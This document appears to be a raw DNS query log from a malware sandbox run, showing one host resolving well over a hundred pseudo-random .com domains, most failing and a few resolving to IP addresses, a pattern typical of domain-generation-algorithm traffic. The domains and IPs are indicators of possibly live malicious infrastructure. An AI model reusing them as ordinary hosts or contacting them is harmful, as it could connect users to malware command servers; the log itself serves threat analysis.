Nov 11, 2024 18:13:35.483258009 CET	1.1.1.1	192.168.2.6	0x58fc	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483258009 CET	1.1.1.1	192.168.2.6	0x58fc	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483838081 CET	1.1.1.1	192.168.2.6	0xa8b7	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483974934 CET	1.1.1.1	192.168.2.6	0xc4b5	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.483984947 CET	1.1.1.1	192.168.2.6	0x10c0	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.484059095 CET	1.1.1.1	192.168.2.6	0xe56c	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.484249115 CET	1.1.1.1	192.168.2.6	0x4e7d	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.485275984 CET	1.1.1.1	192.168.2.6	0x1120	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.485285997 CET	1.1.1.1	192.168.2.6	0xe9fd	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.485296011 CET	1.1.1.1	192.168.2.6	0x9267	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.485583067 CET	1.1.1.1	192.168.2.6	0x4e88	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.486439943 CET	1.1.1.1	192.168.2.6	0xa12f	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.488167048 CET	1.1.1.1	192.168.2.6	0x5d3d	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.488167048 CET	1.1.1.1	192.168.2.6	0x5d3d	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.505780935 CET	1.1.1.1	192.168.2.6	0x32a	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.506118059 CET	1.1.1.1	192.168.2.6	0x53b9	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.506154060 CET	1.1.1.1	192.168.2.6	0xff58	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.506220102 CET	1.1.1.1	192.168.2.6	0x9d0	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.566126108 CET	1.1.1.1	192.168.2.6	0x3726	Name error (3)	gacynuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.567949057 CET	1.1.1.1	192.168.2.6	0x5645	Name error (3)	gaqykab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.587166071 CET	1.1.1.1	192.168.2.6	0xdb89	Name error (3)	lygysij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.591609955 CET	1.1.1.1	192.168.2.6	0x99f2	Name error (3)	purylev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.597562075 CET	1.1.1.1	192.168.2.6	0xf703	Name error (3)	qetylyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.605029106 CET	1.1.1.1	192.168.2.6	0x4d16	Name error (3)	vowykaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.612993956 CET	1.1.1.1	192.168.2.6	0x58af	No error (0)	vojyqem.com	77980.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:13:35.612993956 CET	1.1.1.1	192.168.2.6	0x58af	No error (0)	77980.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.617208958 CET	1.1.1.1	192.168.2.6	0x935a	Name error (3)	pufypiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.621575117 CET	1.1.1.1	192.168.2.6	0xc26c	Name error (3)	pupyxup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.631509066 CET	1.1.1.1	192.168.2.6	0x8ce0	Name error (3)	purytyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.648988962 CET	1.1.1.1	192.168.2.6	0x4cb0	Name error (3)	qekyfeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.666029930 CET	1.1.1.1	192.168.2.6	0x5f29	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.679136038 CET	1.1.1.1	192.168.2.6	0xa90c	Name error (3)	lyryled.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.693458080 CET	1.1.1.1	192.168.2.6	0xd1b3	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.705282927 CET	1.1.1.1	192.168.2.6	0x98ba	Name error (3)	vojydam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.711934090 CET	1.1.1.1	192.168.2.6	0x8f65	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.829407930 CET	1.1.1.1	192.168.2.6	0xae25	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.930054903 CET	1.1.1.1	192.168.2.6	0xc4af	Name error (3)	qedysov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.935774088 CET	1.1.1.1	192.168.2.6	0xb068	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.945288897 CET	1.1.1.1	192.168.2.6	0x7515	Name error (3)	qekynuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.956999063 CET	1.1.1.1	192.168.2.6	0xd288	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.966157913 CET	1.1.1.1	192.168.2.6	0x574c	Name error (3)	lysyxux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.971343994 CET	1.1.1.1	192.168.2.6	0xf220	Name error (3)	puvyjop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.973993063 CET	1.1.1.1	192.168.2.6	0xfe14	Name error (3)	vocyjic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.979285955 CET	1.1.1.1	192.168.2.6	0xa495	Name error (3)	lyvyjox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.002146006 CET	1.1.1.1	192.168.2.6	0xd89d	Name error (3)	vojybek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.033107996 CET	1.1.1.1	192.168.2.6	0x65cd	Name error (3)	pupypiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.050348997 CET	1.1.1.1	192.168.2.6	0x81e1	Name error (3)	gatypub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.052844048 CET	1.1.1.1	192.168.2.6	0xa236	Name error (3)	lysysod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.053237915 CET	1.1.1.1	192.168.2.6	0xd59f	Name error (3)	vopypif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.054357052 CET	1.1.1.1	192.168.2.6	0x9c90	Name error (3)	qebykap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.055923939 CET	1.1.1.1	192.168.2.6	0x2708	Name error (3)	pumylel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.060992002 CET	1.1.1.1	192.168.2.6	0x6889	Name error (3)	pumywaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.062083960 CET	1.1.1.1	192.168.2.6	0xed18	Name error (3)	ganykaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.063330889 CET	1.1.1.1	192.168.2.6	0xe13f	Name error (3)	galyfyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.066664934 CET	1.1.1.1	192.168.2.6	0x1029	Name error (3)	puzyguv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.067591906 CET	1.1.1.1	192.168.2.6	0x5f9b	Name error (3)	volygyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.068877935 CET	1.1.1.1	192.168.2.6	0x5229	Name error (3)	gahyvew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.070986032 CET	1.1.1.1	192.168.2.6	0x7177	Name error (3)	qedyxip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.075432062 CET	1.1.1.1	192.168.2.6	0xef43	Name error (3)	lyrytun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.075656891 CET	1.1.1.1	192.168.2.6	0xb30e	Name error (3)	qetytug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.078699112 CET	1.1.1.1	192.168.2.6	0xc001	Name error (3)	vocymut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.087630033 CET	1.1.1.1	192.168.2.6	0xb877	Name error (3)	lymywaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.096596956 CET	1.1.1.1	192.168.2.6	0xb117	Name error (3)	lyxygud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.099637985 CET	1.1.1.1	192.168.2.6	0x223c	Name error (3)	qeqyreq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.100167036 CET	1.1.1.1	192.168.2.6	0xd81d	Name error (3)	vowyrym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.100500107 CET	1.1.1.1	192.168.2.6	0x5ee7	Name error (3)	pufycol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.100537062 CET	1.1.1.1	192.168.2.6	0xf2c0	Name error (3)	gacyhis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.101150036 CET	1.1.1.1	192.168.2.6	0x48f2	Name error (3)	lygyvar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.118704081 CET	1.1.1.1	192.168.2.6	0xe59	Name error (3)	gaqyreh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.119318008 CET	1.1.1.1	192.168.2.6	0xa470	Name error (3)	qegysoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.121424913 CET	1.1.1.1	192.168.2.6	0xdd2a	Name error (3)	vonyket.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.155756950 CET	1.1.1.1	192.168.2.6	0xcf23	Name error (3)	gatyzys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.169717073 CET	1.1.1.1	192.168.2.6	0xa112	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.179914951 CET	1.1.1.1	192.168.2.6	0xc188	Name error (3)	lykyfen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.180984020 CET	1.1.1.1	192.168.2.6	0xbcd9	Name error (3)	pujydag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.182895899 CET	1.1.1.1	192.168.2.6	0x5209	Name error (3)	vopyzuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.201344967 CET	1.1.1.1	192.168.2.6	0xcf85	Name error (3)	pujybyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.202920914 CET	1.1.1.1	192.168.2.6	0xfd3f	Name error (3)	vonyqok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.203222036 CET	1.1.1.1	192.168.2.6	0xfa7e	Name error (3)	gahydoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.254195929 CET	1.1.1.1	192.168.2.6	0x9831	Name error (3)	qexynyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.272319078 CET	1.1.1.1	192.168.2.6	0x224c	Name error (3)	ganyqow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.274689913 CET	1.1.1.1	192.168.2.6	0xae72	Name error (3)	lyvymir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.274991989 CET	1.1.1.1	192.168.2.6	0xb809	Name error (3)	puvymul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.291142941 CET	1.1.1.1	192.168.2.6	0x4058	Name error (3)	lykynyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.294702053 CET	1.1.1.1	192.168.2.6	0x242e	Name error (3)	qebyqil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.305183887 CET	1.1.1.1	192.168.2.6	0x1996	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.592047930 CET	1.1.1.1	192.168.2.6	0xe55f	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.592890978 CET	1.1.1.1	192.168.2.6	0x61df	Server failure (2)	lysyfyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.597371101 CET	1.1.1.1	192.168.2.6	0x3d9b	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.601305008 CET	1.1.1.1	192.168.2.6	0x559f	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.617609978 CET	1.1.1.1	192.168.2.6	0xa829	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.646701097 CET	1.1.1.1	192.168.2.6	0xa9cb	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.654058933 CET	1.1.1.1	192.168.2.6	0x5e17	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.656850100 CET	1.1.1.1	192.168.2.6	0xc30c	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.663134098 CET	1.1.1.1	192.168.2.6	0x124c	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.665376902 CET	1.1.1.1	192.168.2.6	0x87d1	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.667938948 CET	1.1.1.1	192.168.2.6	0x8c8c	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.714027882 CET	1.1.1.1	192.168.2.6	0x3134	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.721419096 CET	1.1.1.1	192.168.2.6	0xe8fb	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.727772951 CET	1.1.1.1	192.168.2.6	0x4833	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.727772951 CET	1.1.1.1	192.168.2.6	0x4833	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.737186909 CET	1.1.1.1	192.168.2.6	0x9de5	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.763194084 CET	1.1.1.1	192.168.2.6	0x29ee	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.772769928 CET	1.1.1.1	192.168.2.6	0x865e	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.791706085 CET	1.1.1.1	192.168.2.6	0xdd18	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.792052984 CET	1.1.1.1	192.168.2.6	0xa128	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.793842077 CET	1.1.1.1	192.168.2.6	0x9ee5	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.824191093 CET	1.1.1.1	192.168.2.6	0x83fe	No error (0)	puzylyp.com		75.2.71.199	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.824191093 CET	1.1.1.1	192.168.2.6	0x83fe	No error (0)	puzylyp.com		99.83.170.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.826045990 CET	1.1.1.1	192.168.2.6	0x75d1	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.844719887 CET	1.1.1.1	192.168.2.6	0x97bf	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.934045076 CET	1.1.1.1	192.168.2.6	0x87d3	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.937700033 CET	1.1.1.1	192.168.2.6	0xd875	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.970150948 CET	1.1.1.1	192.168.2.6	0x8759	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.979583025 CET	1.1.1.1	192.168.2.6	0x19ad	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.024982929 CET	1.1.1.1	192.168.2.6	0xd1de	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.090826035 CET	1.1.1.1	192.168.2.6	0x6e7b	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.174808979 CET	1.1.1.1	192.168.2.6	0x6299	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.179389954 CET	1.1.1.1	192.168.2.6	0x15fb	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.216618061 CET	1.1.1.1	192.168.2.6	0x800c	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.226330996 CET	1.1.1.1	192.168.2.6	0x2cc5	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.231194019 CET	1.1.1.1	192.168.2.6	0x53f5	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.293128014 CET	1.1.1.1	192.168.2.6	0x18ff	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:37.438110113 CET	1.1.1.1	192.168.2.6	0xfaea	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.828238010 CET	1.1.1.1	192.168.2.6	0x9563	Name error (3)	vojypuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.837096930 CET	1.1.1.1	192.168.2.6	0x53e9	Name error (3)	qetykol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.843009949 CET	1.1.1.1	192.168.2.6	0x780c	Name error (3)	gacyvah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.864375114 CET	1.1.1.1	192.168.2.6	0xb9c7	Name error (3)	lymymud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.867352009 CET	1.1.1.1	192.168.2.6	0xea68	Name error (3)	puvybeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.882210970 CET	1.1.1.1	192.168.2.6	0x4cba	Name error (3)	puryjil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.882762909 CET	1.1.1.1	192.168.2.6	0x1dd6	Name error (3)	lykysix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.914205074 CET	1.1.1.1	192.168.2.6	0x7127	Name error (3)	lygyxun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.916891098 CET	1.1.1.1	192.168.2.6	0xe864	Name error (3)	gahypus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.935487986 CET	1.1.1.1	192.168.2.6	0x1903	Name error (3)	qeqyqiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.941792965 CET	1.1.1.1	192.168.2.6	0xd17f	Name error (3)	qegytyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.942199945 CET	1.1.1.1	192.168.2.6	0x43d3	Name error (3)	vopykak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.942892075 CET	1.1.1.1	192.168.2.6	0x5b24	Name error (3)	qebynyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.944128036 CET	1.1.1.1	192.168.2.6	0x2ea8	Name error (3)	gatykow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.945108891 CET	1.1.1.1	192.168.2.6	0x5568	Name error (3)	vocybam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:39.965632915 CET	1.1.1.1	192.168.2.6	0x8be1	Name error (3)	pujypup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.039402962 CET	1.1.1.1	192.168.2.6	0x1369	Name error (3)	qebyhuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.044430017 CET	1.1.1.1	192.168.2.6	0xa08b	Name error (3)	volybec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.050388098 CET	1.1.1.1	192.168.2.6	0xe4fd	Name error (3)	pujycov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.480603933 CET	1.1.1.1	192.168.2.6	0xdb7e	Name error (3)	vofypuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.481663942 CET	1.1.1.1	192.168.2.6	0x7b5f	Name error (3)	qeqykog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.481683016 CET	1.1.1.1	192.168.2.6	0xc201	Name error (3)	ganynyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.481868029 CET	1.1.1.1	192.168.2.6	0xc40e	Name error (3)	gatyrez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.501646042 CET	1.1.1.1	192.168.2.6	0x344e	Name error (3)	puzybep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.514965057 CET	1.1.1.1	192.168.2.6	0xdeeb	Name error (3)	lymyjon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.515095949 CET	1.1.1.1	192.168.2.6	0x4ef5	Name error (3)	gadyzyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.515690088 CET	1.1.1.1	192.168.2.6	0xe67a	Name error (3)	qexyfel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.515783072 CET	1.1.1.1	192.168.2.6	0x856d	Name error (3)	gadypuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.516697884 CET	1.1.1.1	192.168.2.6	0xc675	Name error (3)	galyvas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.516779900 CET	1.1.1.1	192.168.2.6	0x3f7d	Name error (3)	puzydal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.517174006 CET	1.1.1.1	192.168.2.6	0xce65	Name error (3)	lyvyguj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.517451048 CET	1.1.1.1	192.168.2.6	0xe985	Name error (3)	vonymuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.517755985 CET	1.1.1.1	192.168.2.6	0x7e20	Name error (3)	qedytul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.517976999 CET	1.1.1.1	192.168.2.6	0x8357	Name error (3)	pumymuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.519011974 CET	1.1.1.1	192.168.2.6	0x11e8	Name error (3)	vonyjim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.519285917 CET	1.1.1.1	192.168.2.6	0xd85f	Name error (3)	lyvynen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.519296885 CET	1.1.1.1	192.168.2.6	0xf24d	Name error (3)	vopyret.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.519373894 CET	1.1.1.1	192.168.2.6	0x44a0	Name error (3)	ganyhuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.519864082 CET	1.1.1.1	192.168.2.6	0x991f	Name error (3)	pumyjig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.520071030 CET	1.1.1.1	192.168.2.6	0x5b86	Name error (3)	purywop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.520138979 CET	1.1.1.1	192.168.2.6	0x9c19	Name error (3)	qegyxug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.523436069 CET	1.1.1.1	192.168.2.6	0xf8aa	Name error (3)	lykyvod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.523555040 CET	1.1.1.1	192.168.2.6	0xc81d	Name error (3)	pupytyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.533642054 CET	1.1.1.1	192.168.2.6	0xebbb	Name error (3)	qetyrap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.535123110 CET	1.1.1.1	192.168.2.6	0x71c9	Name error (3)	lyxyfar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.535919905 CET	1.1.1.1	192.168.2.6	0xd475	Name error (3)	vowyqoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.537290096 CET	1.1.1.1	192.168.2.6	0xa2c1	Name error (3)	lysylej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.537934065 CET	1.1.1.1	192.168.2.6	0x642d	Name error (3)	qekyvav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.538218021 CET	1.1.1.1	192.168.2.6	0x978a	Name error (3)	puvygyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.538958073 CET	1.1.1.1	192.168.2.6	0x1e15	Name error (3)	pufyxug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.538989067 CET	1.1.1.1	192.168.2.6	0x98a2	Name error (3)	gaqyqis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.539906025 CET	1.1.1.1	192.168.2.6	0xd01	Name error (3)	galydoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.539937019 CET	1.1.1.1	192.168.2.6	0x549f	Name error (3)	vojycif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.540935993 CET	1.1.1.1	192.168.2.6	0x97f	Name error (3)	lysytyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.541347027 CET	1.1.1.1	192.168.2.6	0x3cdb	Name error (3)	volydot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.541356087 CET	1.1.1.1	192.168.2.6	0xa995	Name error (3)	gacyfew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.542314053 CET	1.1.1.1	192.168.2.6	0xc372	Name error (3)	qedyleq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.542620897 CET	1.1.1.1	192.168.2.6	0x91b2	Name error (3)	lyrywax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.556709051 CET	1.1.1.1	192.168.2.6	0xc278	Name error (3)	lyryjir.com	none	none	A (IP address)	IN (0x0001)	false
